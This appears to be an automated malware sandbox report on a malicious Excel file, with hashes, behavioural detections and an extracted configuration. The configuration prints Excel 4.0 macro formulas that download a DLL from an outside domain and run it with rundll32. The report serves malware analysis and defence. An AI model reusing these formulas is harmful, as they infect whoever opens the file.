General
- Target: 49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.zip
- Size: 61KB
- Sample: 200423-q5tnjca8x2
- MD5: b5102277fec5cf20132d3d542cf4648e
- SHA1: 40610a77a25e9ff604f7e6f9320e8dab8036a142
- SHA256: 876752ccf051c21b583d504ed35353b986a38545fc8feeb399fceb3efdf035f7
- SHA512: eb45d4953505fe4552434c5a5fe666b4e8d83918245f31214b1c3b1ed6bb3b817f8e46725716982e4c835e55f7ab1903025672fee76e7299b5e003d86dd0dd32
Static task
- static1

Behavioral task
- behavioral1
- Sample: 49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
- Resource: win7v200410

Malware Config
- Extracted: http://gveejlsffxmfjlswjmfm.com/files/april23.dll
- formulas:
  =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://gveejlsffxmfjlswjmfm.com/files/april23.dll","C:\ProgramData\todxofs.dll",0,0)
  =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\todxofs.dll,DllRegisterServer",0,0)
  =HALT()
Targets
- Target: 49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
- Size: 76KB
- MD5: 228003634e57d37f08787be02c0b6c14
- SHA1: 0e71bb6f250012609c08adf74d1cec6587b6cc05
- SHA256: 49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908
- SHA512: 5adcc817a196ef0cfc176d089564d8d87528e0a69134287b8858907a8e97040bdbc05b0b5d87db9a9856e641673c27effc3bed5f70754e87dbbef0d64dfa1375
- Process spawned unexpected child process: This typically indicates the parent process was compromised via an exploit or macro.
- Blacklisted process makes network request
- Loads dropped DLL
- Process spawned suspicious child process: This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
- Suspicious use of SetThreadContext